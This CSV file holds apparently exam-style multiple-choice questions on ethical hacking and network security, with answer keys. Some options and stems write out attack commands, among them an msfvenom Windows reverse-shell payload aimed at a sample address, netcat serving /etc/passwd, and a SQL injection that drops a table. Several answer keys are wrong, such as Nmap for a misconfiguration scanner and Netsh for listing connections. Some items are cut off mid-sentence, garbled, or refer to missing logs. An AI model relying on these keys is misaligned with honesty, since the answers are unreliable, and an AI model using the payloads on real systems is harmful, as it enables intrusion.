id,question,A,B,C,D,E,F,G,answer
66,"An organization is performing a vulnerability assessment tor mitigating threats. James, a pen tester, scanned the organization by building an inventory of the protocols found on the organization's machines to detect which ports are attached to services such as an email server, a web server or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests. What is the type of vulnerability assessment solution that James employed in the above scenario?","Product-based solutions","Tree-based assessment","Service-based solutions","inference-based assessment","","","","D"
67,"Gavin owns a white-hat firm and is performing a website security audit for one of his clients. He begins by running a scan which looks for common misconfigurations and outdated software versions. Which of the following tools is he most likely using?","Nikto","Nmap","Metasploit","Armitage","","","","B"
68,"During the process of encryption and decryption, what keys are shared?","Private keys","User passwords","Public keys","Public and private keys","","","","C"
69,"Abel, a cloud architect, uses container technology to deploy applications/software including all its dependencies, such as libraries and configuration files, binaries, and other resources that run independently from other processes in the cloud environment. For the containerization of applications, he follows the five-tier container technology architecture. Currently. Abel is verifying and validating image contents, signing images, and sending them to the registries. Which of the following tiers of the container technology architecture Is Abel currently working in?","Tier-1: Developer machines","Tier-4: Orchestrators","Tier-3: Registries","Tier-2: Testing and accreditation systems","","","","D"
70,"Henry Is a cyber security specialist hired by BlackEye - Cyber security solutions. He was tasked with discovering the operating system (OS) of a host. He used the Unkornscan tool to discover the OS of the target system. As a result, he obtained a TTL value, which Indicates that the target system is running a Windows OS. Identify the TTL value Henry obtained, which indicates that the target OS is Windows.","64","128","255","138","","","","B"
71,"When a security analyst prepares for the formal security assessment - what of the following should be done in order to determine inconsistencies in the secure assets database and verify that system is compliant to the minimum security baseline?","Data items and vulnerability scanning","Interviewing employees and network engineers","Reviewing the firewalls configuration","Source code review","","","","A"
72,"which type of virus can change its own code and then cipher itself multiple times as it replicates?","Stealth virus","Tunneling virus","Cavity virus","Encryption virus","","","","A"
73,"Which of the following statements is FALSE with respect to Intrusion Detection Systems?","Intrusion Detection Systems can be configured to distinguish specific content in network packets","Intrusion Detection Systems can easily distinguish a malicious payload in an encrypted traffic","Intrusion Detection Systems require constant update of the signature library","Intrusion Detection Systems can examine the contents of the data n context of the network protocol","","","","B"
74,"Which of the following DoS tools is used to attack target web applications by starvation of available sessions on the web server? The tool keeps sessions at halt using never-ending POST transmissions and sending an arbitrarily large content-length header value.","My Doom","Astacheldraht","R-U-Dead-Yet?(RUDY)","LOIC","","","","C"
75,"Morris, a professional hacker, performed a vulnerability scan on a target organization by sniffing the traffic on the network lo identify the active systems, network services, applications, and vulnerabilities. He also obtained the list of the users who are currently accessing the network. What is the type of vulnerability assessment that Morris performed on the target organization?","internal assessment","Passive assessment","External assessment","Credentialed assessment","","","","B"
76,"Attacker Steve targeted an organization's network with the aim of redirecting the company's web traffic to another malicious website. To achieve this goal, Steve performed DNS cache poisoning by exploiting the vulnerabilities In the DNS server software and modified the original IP address of the target website to that of a fake website. What is the technique employed by Steve to gather information for identity theft?","Pretexting","Pharming","Wardriving","Skimming","","","","B"
77,"Gilbert, a web developer, uses a centralized web API to reduce complexity and increase the Integrity of updating and changing data. For this purpose, he uses a web service that uses HTTP methods such as PUT. POST. GET. and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application. What is the type of web-service API mentioned in the above scenario?","JSON-RPC","SOAP API","RESTful API","REST API","","","","C"
78,"This form of encryption algorithm is asymmetric key block cipher that is characterized by a 128-bit block size, and its key size can be up to 256 bits. Which among the following is this encryption algorithm?","Twofish encryption algorithm","HMAC encryption algorithm","IDEA","Blowfish encryption algorithm","","","","A"
79,"Which command can be used to show the current TCP/IP connections?","Netsh","Netstat","Net use connection","Net use","","","","A"
80,"Tremp is an IT Security Manager, and he is planning to deploy an IDS in his small company. He is looking for an IDS with the following characteristics: - Verifies success or failure of an attack - Monitors system activities Detects attacks that a network-based IDS fails to detect - Near real-time detection and response - Does not require additional hardware - Lower entry cost Which type of IDS is best suited for Tremp's requirements?","Gateway-based IDS","Network-based IDS","Host-based IDS","Open source-based","","","","C"
81,"Which of the following are well known password-cracking programs?","L0phtcrack","NetCat","Jack the Ripper","Netbus","John the Ripper","","","AE"
82,"What is the algorithm used by LM for Windows2000 SAM?","MD4","DES","SHA","SSL","","","","B"
83,"In Trojan terminology, what is a covert channel?","A channel that transfers information within a computer system or network in a way that violates the security policy","A legitimate communication path within a computer system or network for transfer of data","It is a kernel operation that hides boot processes and services to mask detection","It is Reverse tunneling technique that uses HTTPS protocol instead of HTTP protocol to establish connections","","","","A"
84,"Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and location tags of recently visited places. Realizing this. James, a professional hacker, targets Emily and her acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers information to perform other sophisticated attacks. What is the tool employed by James in the above scenario?","ophcrack","Hootsuite","VisualRoute","HULK","","","","B"
85,"s) for his company for over 15 years and has become very successful. One day, Yancey comes in to work and finds out that the company will be downsizing and he will be out of a job in two weeks. Yancey is very angry and decides to place logic bombs, viruses, Trojans, and backdoors all over the network to take down the company once he has left. Yancey does not care if his actions land him in jail for 30 or more years, he just wants the company to pay for what they are doing to him. What would Yancey be considered?","Yancey would be considered a Suicide Hacker","Since he does not care about going to jail, he would be considered a Black Hat","Because Yancey works for the company currently; he would be a White Hat","Yancey is a Hacktivist Hacker since he is standing up to a company that is downsizing","","","","A"
86,"What piece of hardware on a computer's motherboard generates encryption keys and only releases a part of the key so that decrypting a disk on a new piece of hardware is not possible?","CPU","GPU","UEFI","TPM","","","","D"
87,"An attacker redirects the victim to malicious websites by sending them a malicious link by email. The link appears authentic but redirects the victim to a malicious web page, which allows the attacker to steal the victim's data. What type of attack is this?","Phishing","Vlishing","Spoofing","DDoS","","","","A"
88,"Abel, a security professional, conducts penetration testing in his client organization to check for any security loopholes. He launched an attack on the DHCP servers by broadcasting forged DHCP requests and leased all the DHCP addresses available in the DHCP scope until the server could not issue any more IP addresses. This led to a Dos attack, and as a result, legitimate employees were unable to access the clients network. Which of the following attacks did Abel perform in the above scenario?","VLAN hopping","DHCP starvation","Rogue DHCP server attack","STP attack","","","","B"
89,"what is the port to block first in case you are suspicious that an loT device has been compromised?","22","443","48101","80","","","","C"
90,"While browsing his Facebook teed, Matt sees a picture one of his friends posted with the caption. ""Learn more about your friends!"", as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post is legitimate. Matt responds to the questions on the post, a few days later. Mates bank account has been accessed, and the password has been changed. What most likely happened?","Matt inadvertently provided the answers to his security questions when responding to the post.","Matt's bank-account login information was brute forced.","Matt Inadvertently provided his password when responding to the post.","Matt's computer was infected with a keylogger.","","","","A"
91,"Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network. Which of the following Nmap commands must John use to perform the TCP SYN ping scan?","nmap -sn -pp < target ip address >","nmap -sn -PO < target IP address >","nmap -sn -PS < target IP address >","nmap -sn -PA < target IP address >","","","","C"
92,"While testing a web application in development, you notice that the web server does not properly ignore the ??dot dot slash?? (../) character string and instead returns the file listing of a folder structure of the server. What kind of attack is possible in this scenario?","Cross-site scripting","Denial of service","SQL injection","Directory traversal","","","","D"
93,"While examining audit logs, you discover that people are able to telnet into the SMTP server on port 25. You would like to block this, though you do not see any evidence of an attack or other wrong doing. However, you are concerned about affecting the normal functionality of the email server. From the following options choose how best you can achieve this objective?","Block port 25 at the firewall.","Shut off the SMTP service on the server.","Force all connections to use a username and password.","Switch from Windows Exchange to UNIX Sendmail.","None of the above.","","","E"
94,"Password cracking programs reverse the hashing process to recover passwords. (True/False.)","True","False","","","","","","B"
95,"s) or you may contact us at the following address: Media Internet Consultants, Edif. Neptuno, Planta Baja, Ave. Ricardo J. Alfaro, Tumba Muerto, n/a Panama How will you determine if this is Real Anti-Virus or Fake Anti-Virus website?","Look at the website design, if it looks professional then it is a Real Anti-Virus website","Connect to the site using SSL, if you are successful then the website is genuine","Search using the URL and Anti-Virus product name into Google and lookout for suspicious warnings against this site","Download and install Anti-Virus software from this suspicious looking site, your Windows 7 will prompt you and stop the installation if the downloaded file is a malware","Download and install Anti-Virus software from this suspicious looking site, your Windows 7 will prompt you and stop the installation if the downloaded file is a malware","","","C"
96,"During the enumeration phase. Lawrence performs banner grabbing to obtain information such as OS details and versions of services running. The service that he enumerated runs directly on TCP port 445. Which of the following services is enumerated by Lawrence in this scenario?","Server Message Block (SMB)","Network File System (NFS)","Remote procedure call (RPC)","Telnet","","","","A"
97,"Ethical backer jane Doe is attempting to crack the password of the head of the it department of ABC company. She Is utilizing a rainbow table and notices upon entering a password that extra characters are added to the password after submitting. What countermeasure is the company using to protect against rainbow tables?","Password key hashing","Password salting","Password hashing","Account lockout","","","","B"
98,"An attacker runs netcat tool to transfer a secret file between two hosts. He is worried about information being sniffed on the network. How would the attacker use netcat to encrypt the information before transmitting onto the wire?","Machine A: netcat -l -p -s password 1234 < testfileMachine B: netcat <machine A IP> 1234","Machine A: netcat -l -e magickey -p 1234 < testfileMachine B: netcat <machine A IP> 1234","Machine A: netcat -l -p 1234 < testfile -pw passwordMachine B: netcat <machine A IP> 1234 -pw password","Use cryptcat instead of netcat","","","","D"
99,"what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?","msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c","msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c","msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe","msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe","","","","C"
100,"jane invites her friends Alice and John over for a LAN party. Alice and John access Jane's wireless network without a password. However. Jane has a long, complex password on her router. What attack has likely occurred?","Wireless sniffing","Piggybacking","Evil twin","Wardriving","","","","C"
101,"Fred is the network administrator for his company. Fred is testing an internal switch. From an external IP address, Fred wants to try and trick this switch into thinking it already has established a session with his computer. How can Fred accomplish this?","Fred can accomplish this by sending an IP packet with the RST/SIN bit and the source address of his computer.","He can send an IP packet with the SYN bit and the source address of his computer.","Fred can send an IP packet with the ACK bit set to zero and the source address of the switch.","Fred can send an IP packet to the switch with the ACK bit and the source address of his machine.","","","","D"
102,"Taylor, a security professional, uses a tool to monitor her company's website, analyze the website's traffic, and track the geographical location of the users visiting the company's website. Which of the following tools did Taylor employ in the above scenario?","WebSite Watcher","web-Stat","Webroot","WAFW00F","","","","B"
103,"An Internet Service Provider (ISP) has a need to authenticate users connecting via analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay network. Which AAA protocol is the most likely able to handle this requirement?","TACACS+","DIAMETER","Kerberos","RADIUS","","","","D"
104,"In your cybersecurity class, you are learning about common security risks associated with web servers. One topic that comes up is the risk posed by using default server settings. Why is using default settings ona web - server considered a security risk, and what would be the best initial step to mitigate this risk?","Default settings cause server malfunctions; simplify the settings","Default settings allow unlimited login attempts; setup account lockout","Default settings reveal server software type; change these settings","Default settings enable auto-updates; disable and manually patch","","","","C"
105,"Attempting an injection attack on a web server based on responses to True/False QUESTION NO:s is called which of the following?","Compound SQLi","Blind SQLi","Classic SQLi","DMS-specific SQLi","","","","B"
106,"You're the security manager for a tech company that uses a database to store sensitive customer data. You have implemented countermeasures against SQL injection attacks. Recently, you noticed some suspicious activities and suspect an attacker is using SQL injection techniques. The attacker is believed to use different forms of payloads in his SQL queries. In the case of a successful SQL injection attack, which of the following payloads would have the most significant impact?","??OR 'T=""1: This payload manipulates the WHERE clause of an SQL statement, allowing the attacker to view unauthorized data","??OR username LIKE '%: This payload uses the LIKE operator to search for a specific pattern in a column","OR ??a??='a; DROP TABLE members; --: This payload combines the manipulation of the WHERE clausewith a destructive action, causing data loss","UNION SELECT NULL, NULL, NULL -- : This payload manipulates the UNION SQL operator, enabling the attacker to retrieve data from different database tables","","","","C"
107,"What is the least important information when you analyze a public IP address in a security alert?","DNS","Whois","Geolocation","ARP","","","","D"
108,"What useful information is gathered during a successful Simple Mail Transfer Protocol (SMTP) enumeration?","The two internal commands VRFY and EXPN provide a confirmation of valid users, email addresses, aliases, and mailing lists.","Reveals the daily outgoing message limits before mailboxes are locked","The internal command RCPT provides a list of ports open to message traffic.","A list of all mail proxy server addresses used by the targeted host","","","","A"
109,"Study the following log extract and identify the attack.","Hexcode Attack","Cross Site Scripting","Multiple Domain Traversal Attack","Unicode Directory Traversal Attack","","","","D"
110,"You are analysing traffic on the network with Wireshark. You want to routinely run a cron job which will run the capture against a specific set of IPs - 192.168.8.0/24. What command you would use?","wireshark --fetch ''192.168.8*''","wireshark --capture --local masked 192.168.8.0 ---range 24","tshark -net 192.255.255.255 mask 192.168.8.0","sudo tshark -f''net 192 .68.8.0/24''","","","","D"
111,"What does the following command in netcat do? nc -l -u -p55555 < /etc/passwd","logs the incoming connections to /etc/passwd file","loads the /etc/passwd file to the UDP port 55555","grabs the /etc/passwd file when connected to UDP port 55555","deletes the /etc/passwd file when connected to the UDP port 55555","","","","C"
112,"You are programming a buffer overflow exploit and you want to create a NOP sled of 200 bytes in the program exploit.c What is the hexadecimal value of NOP instruction?","0x60","0x80","0x70","0x90","","","","D"
113,"Which of the following is the structure designed to verify and authenticate the identity of individuals within the enterprise taking part in a data exchange?","SOA","biometrics","single sign on","PKI","","","","D"
114,"What two conditions must a digital signature meet?","Has to be the same number of characters as a physical signature and must be unique.","Has to be unforgeable, and has to be authentic.","Must be unique and have special characters.","Has to be legible and neat.","","","","B"
115,"Which of the following tools can be used to perform a zone transfer?","NSLookup","Finger","Dig","Sam Spade","Host","Netcat","Neotrace","ACDE"
116,"One of your team members has asked you to analyze the following SOA record. What is the version? Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400.) (Choose four.)","200303028","3600","604800","2400","60","4800","","A"
117,"When discussing passwords, what is considered a brute force attack?","You attempt every single possibility until you exhaust all possible combinations or discover the password","You threaten to use the rubber hose on someone unless they reveal their password","You load a dictionary of words into your cracking program","You create hashes of a large number of words and compare it with the encrypted passwords","You wait until the password expires","","","A"
118,"You are working as a Security Analyst in a company XYZ that owns the whole subnet range of 23.0.0.0/8 and 192.168.0.0/8. While monitoring the data, you find a high number of outbound connections. You see that IP’s owned by XYZ (Internal) and private IP’s are communicating to a Single Public IP. Therefore, the Internal IP’s are sending data to the Public IP. After further analysis, you find out that this Public IP is a blacklisted IP, and the internal communicating devices are compromised. What kind of attack does the above scenario depict?","Botnet Attack","Spear Phishing Attack","Advanced Persistent Threats","Rootkit Attack","","","","A"
119,"Joseph was the Web site administrator for the Mason Insurance in New York, who's main Web site was located at www.masonins.com. Joseph uses his laptop computer regularly to administer the Web site. One night, Joseph received an urgent phone call from his friend, Smith. According to Smith, the main Mason Insurance web site had been vandalized! All of its normal content was removed and replaced with an attacker's message ''Hacker Message: You are dead! Freaks!” From his office, which was directly connected to Mason Insurance's internal network, Joseph surfed to the Web site using his laptop. In his browser, the Web site looked completely intact. No changes were apparent. Joseph called a friend of his at his home to help troubleshoot the problem. The Web site appeared defaced when his friend visited using his DSL connection. So, while Smith and his friend could see the defaced page, Joseph saw the intact Mason Insurance web site. To help make sense of this problem, Joseph decided to access the Web site using hisdial-up ISP. He disconnected his laptop from the corporate internal network and used his modem to dial up the same ISP used by Smith. After his modem connected, he quickly typed www.masonins.com in his browser to reveal the following web page: After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against the entire Web site, and determined that every system file and all the Web content on the server were intact. How did the attacker accomplish this hack?","ARP spoofing","SQL injection","DNS poisoning","Routing table injection","","","","C"
120,"Which of the following algorithms can be used to guarantee the integrity of messages being sent, in transit, or stored?","symmetric algorithms","asymmetric algorithms","hashing algorithms","integrity algorithms","","","","C"
121,"In the field of cryptanalysis, what is meant by a “rubber-hose” attack?","Forcing the targeted keystream through a hardware-accelerated device such as an ASIC.","A backdoor placed into a cryptographic algorithm by its creator.","Extraction of cryptographic secrets through coercion or torture.","Attempting to decrypt ciphertext by making logical assumptions about the contents of the original plaintext.","","","","C"
122,"In an internal security audit, the white hat hacker gains control over a user account and attempts to acquire access to another account's confidential files and information. How can he achieve this?","Privilege Escalation","Shoulder-Surfing","Hacking Active Directory","Port Scanning","","","","A"
123,"Which DNS resource record can indicate how long any ""DNS poisoning"" could last?","MX","SOA","NS","TIMEOUT","","","","B"
124,"Based on the following extract from the log of a compromised machine, what is the hacker really trying to steal?","har.txt","SAM file","wwwroot","Repair file","","","","B"
125,"You are tasked to configure the DHCP server to lease the last 100 usable IP addresses in subnet to. 1.4.0/23. Which of the following IP addresses could be teased as a result of the new configuration?","210.1.55.200","10.1.4.254","10..1.5.200","10.1.4.156","","","","C"
126,"Log monitoring tools performing behavioral analysis have alerted several suspicious logins on a Linux server occurring during non-business hours. After further examination of all login activities, it is noticed that none of the logins have occurred during typical work hours. A Linux administrator who is investigating this problem realizes the system time on the Linux server is wrong by more than twelve hours. What protocol used on Linux servers to synchronize the time has stopped working?","Time Keeper","NTP","PPP","OSPP","","","","B"
